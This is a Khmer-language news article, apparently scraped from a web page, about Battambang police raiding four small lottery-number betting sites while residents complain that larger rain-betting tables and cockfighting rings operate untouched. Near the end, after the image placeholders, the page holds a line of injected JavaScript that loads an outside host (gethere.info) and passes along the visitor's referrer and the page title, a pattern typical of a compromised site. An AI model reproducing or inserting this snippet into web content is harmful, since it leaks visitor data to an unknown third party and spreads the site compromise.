ព្រឹតិ្តការណ៍ថ្មីៗ

ពលរដ្ឋថា សមត្ថកិច្ចខេត្តបាត់ដំបងបង្ក្រាបបានតែទីតាំងកត់កន្ទុយលេខតូចៗ ចំណែកតារាងភ្នាល់ ទឹកភ្លៀង និងវង់ប៉ាញ់អាប៉ោងបើកលេងគគ្រឹកគគ្រេងមិនហ៊ានទៅក្បែរ

1 ឆ្នាំ មុន 0 តូ សុផល

ខេត្តបាត់ដំបង៖ ក្រោយពីកម្លាំងសមត្ថកិច្ចខេត្តបាត់ដំបងបង្ក្រាបនៅទីតាំងល្បែងកន្ទុយលេខ ចំនួន០៤ ទីតាំងផ្សេងៗ គ្នាក្នុងក្រុងបាត់ដំបង មានមតិប្រជាពលរដ្ឋបានសួរថា ម៉េចក៍ចាប់តែកន្ទុយលេខចឹង មិនចាប់តារាងទឹកភ្លៀង និង វង់អាប៉ាញ់អាប៉ោង នៅវាលស្រែ១០០ កំពុងដំណើរការយ៉ាងគគ្រឹកគគ្រេង ផង? សំណួរទាំងនេះមានតែបងៗ សមត្ថកិច្ចខេត្តបាត់ដំបងទេ ដែលអាចបកស្រាយបាន។

គួររំលឹកដែរថា នារសៀលថ្ងទី ៩ ខែ មិថុនា ឆ្នាំ ២០១៦ នេះ ក្រោមបញ្ជាផ្ទាល់ពីឧត្តមសេនីយ៍ទោ ស ថេត ស្នងការនៃស្នងការដ្ឋាននគរបាលខេត្តបាត់ដំបងនិងដោយ បានការអនុញ្ញាតិពីលោកព្រះរាជអាជ្ញាអម សាលាដំបូងខេត្តបាត់ដំបងផងនោះ ឧត្តមសេនីយ៍ត្រី ជេត វណ្ណី ស្នងការរងទទួលផែននគរបាលយុត្តិធម៌ បានដឹកនាំ បញ្ជានិងចូលរួមជាមួយលោកវរសេនីយ៍ត្រី ប៉ាង ហៀង អធិការនគរបាលក្រុងបាត់ដំបង ចុះ បង្ក្រាបទីតាំងកត់កន្ទុយលេខ ( ឆ្នោត ) ចំនួន ០៤ ទីតាំងផ្សេងៗគ្នាក្នុងក្រុងបាត់ដំបង។ ក្នុងកិច្ចប្រតិបត្តិការនេះ មនុស្សចំនួន០៩នាក់ស្រី ០៦នាក់ (មានទាំងអ្នកលក់ និងអ្នកទិញ) ត្រូវបានឃាត់ ខ្លួន រួមទាំងវត្ថុតាងមួយចំនួនត្រូវបានដកហូត។
ជនសង្ស័យទាំង០៩ នាក់ត្រូវបាននាំមកកាន់អធិការដ្ឋាននគរបាលក្រុងបាត់ដំបង ដើម្បីកសាងសំណុំ រឿងបញ្ជូនទៅតុលាការចាត់វិធានការតាមច្បាប់។

image image image image image image image image image image images.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

បន្ថែមយោបល់របស់អ្នក

យោបល់

 

 

ព័ត៌មានពាក់ព័ន្ធ